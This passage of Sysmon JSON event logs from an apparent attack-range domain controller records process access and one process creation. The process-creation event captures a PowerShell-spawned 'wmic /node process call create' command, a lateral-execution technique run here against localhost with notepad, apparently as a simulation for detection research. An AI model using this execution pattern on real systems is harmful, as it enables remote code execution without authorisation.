07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5466,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5467,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5468,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5469,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nSourceProcessId: 2992\r\nSourceThreadId: 5056\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-001027D90800}\r\nTargetProcessId: 4788\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15631623)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","SourceProcessId":"2992","SourceThreadId":"5056","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-001027D90800}","TargetProcessId":"4788","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15631623)","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5470,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-001027D90800}\r\nTargetProcessId: 4788\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-001027D90800}","TargetProcessId":"4788","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5471,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.374\r\nProcessGuid: {41C8662E-20D6-5F25-0000-0010F2D90800}\r\nProcessId: 3796\r\nImage: C:\\Windows\\System32\\wbem\\WMIC.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: WMI Commandline Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: wmic.exe\r\nCommandLine: wmic  /node:\"127.0.0.1\" process call create notepad.exe \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E\r\nParentProcessGuid: {41C8662E-20D6-5F25-0000-001027D90800}\r\nParentProcessId: 4788\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"wmic /node:\"127.0.0.1\" process call create notepad.exe\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.374","ProcessGuid":"{41C8662E-20D6-5F25-0000-0010F2D90800}","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"WMI Commandline Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"wmic.exe","CommandLine":"wmic  /node:\"127.0.0.1\" process call create notepad.exe ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E","ParentProcessGuid":"{41C8662E-20D6-5F25-0000-001027D90800}","ParentProcessId":"4788","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic /node:\"127.0.0.1\" process call create notepad.exe\" ","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5472,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-20D6-5F25-0000-001027D90800}\r\nSourceProcessId: 4788\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-0010F2D90800}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-20D6-5F25-0000-001027D90800}","SourceProcessId":"4788","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-0010F2D90800}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5473,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D6-5F25-0000-0010F2D90800}\r\nTargetProcessId: 3796\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:18.362","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D6-5F25-0000-0010F2D90800}","TargetProcessId":"3796","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5474,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:18.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 